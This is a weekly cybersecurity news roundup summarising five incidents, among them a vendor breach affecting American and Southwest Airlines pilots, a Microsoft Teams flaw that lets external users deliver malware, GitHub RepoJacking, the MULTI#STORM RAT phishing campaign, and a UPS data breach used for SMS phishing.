Airlines disclose pilot data breach and the Microsoft Teams bug
Major global airlines disclose data breach exposing pilot credentials, Microsoft Teams bug enables malware delivery from external users and the Github RepoJacking threat. Catch all this and more in this week’s edition of Cybersecurity Weekly.
Should you pay the ransom?
1. Southwest Airlines and American Airlines disclose vendor breach affecting pilots
Global airline carriers American Airlines and Southwest Airlines recently disclosed data breaches caused by a hack on third-party vendor Pilot Credentials. On April 30, an unauthorized individual accessed the vendor's systems, stealing documents containing the personal information of cadet applicants and official pilots. Southwest Airlines reported 3,900 affected individuals, whereas American Airlines reported 5,745 affected individuals. Both airlines have terminated their relationship with the vendor and are cooperating with law enforcement.
2. Microsoft Teams vulnerability allows external users to inject malware
Security researchers at UK-based company Jumpsec have discovered a method to deliver malware via Microsoft Teams, even with restrictions on files from external sources. The default configuration of Teams allows communication with external tenant accounts, which the researchers exploited to send a malicious payload directly to a target inbox. By manipulating the internal and external recipient IDs in a message's POST request, they were able to bypass client-side protections. Microsoft has been notified but deemed the issue not urgent for immediate servicing.
3. RepoJacking is a threat to millions of GitHub repositories
Aqua Security's Nautilus research group has discovered a vulnerability known as RepoJacking, which puts millions of GitHub repositories at risk. RepoJacking occurs when a malicious actor registers a username previously used by an organization, creating a repository that appears legitimate but is controlled by the attacker. The vulnerability can lead to remote code execution on internal systems or customer environments. Researchers found that 2.95% of a sample of 1.25 million repositories were vulnerable, suggesting potentially over 300 million vulnerable repositories on GitHub.
4. New MULTI#STORM RAT campaign aims for India and the U.S.
A sophisticated phishing campaign known as MULTI#STORM is targeting the U.S. and India by utilizing JavaScript files to deliver remote access trojans (RATs) on compromised systems. The attack involves a multi-stage process where victims click on an embedded link in an email, leading them to a password-protected ZIP file hosted on Microsoft OneDrive. After extraction, a JavaScript file executes PowerShell commands to retrieve and execute payloads, including a Python-based executable acting as a dropper. The attack concludes with the deployment of Warzone RAT, which can harvest sensitive data and download additional malware. People are advised to be vigilant when opening emails, especially those emphasizing urgency.
5. UPS confirms data breach after hackers use customer data for SMS phishing
UPS has issued a data breach notification to customers, revealing that their personal information may have been exposed through phishing attacks. The company discovered that attackers used its package look-up tools to access recipient details, including addresses, names and potentially order numbers and phone numbers. The breach occurred between February 2022 and April 2023. Threat actors posing as legitimate companies sent fraudulent SMS demanding payment for delivery. UPS is working with law enforcement and partners to address the situation.
See Infosec IQ in action